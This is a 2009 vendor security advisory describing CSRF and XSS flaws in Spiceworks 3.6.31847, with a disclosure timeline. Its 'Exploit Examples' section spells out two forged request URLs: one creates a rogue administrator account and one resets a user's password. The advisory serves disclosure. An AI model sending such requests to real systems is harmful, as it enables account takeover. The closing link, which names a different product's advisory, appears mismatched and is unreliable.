|
nGenuity Information Services - Security Advisory
Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities
(XSS & CSRF)
Application: Spiceworks 3.6.31847
Vendor: Spiceworks
Vendor website: http://www.spiceworks.com
Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
Class: XSS, CSRF
I. BACKGROUND
Spiceworks is a network management, monitoring, helpdesk, etc
application that
uses a web based front end.
II. DETAILS
Multiple vulnerabilities exist within the Spiceworks platform that
can be used
to take over or otherwise abuse the application / infrastructure.
These vulnerabilities allow for the following attack scenarios to
be executed.
1. Creation of a new Administrator account
2. Password reset of users
Exploit Examples:
Create Administrator Account:
http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&use
r%5Bla
st_name%5D=Nobody&user%5Bemail%5D=user%40example.
com&user%5Brole%5D=admin&us
er%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PAS
SWORD
User Password Reset:
http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PA
SSWORD
&editorId=password_entry_for_1
III. REFERENCES
[1] - http://www.spiceworks.com
[2] - http://cwe.mitre.org/data/definitions/79.html
[3] - http://cwe.mitre.org/data/definitions/352.html
IV. VENDOR COMMUNICATION
4.1.2009 - Vulnerability Discovery & Vendor Notification
4.6.2009 - Second attempt to contact vendor
4.7.2009 - Initial vendor response
8.8.2009 - Advisory Release
Copyright (c) 2009 nGenuity Information Services, LLC
http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-x
ss-in-kayako-supportsuite/
|
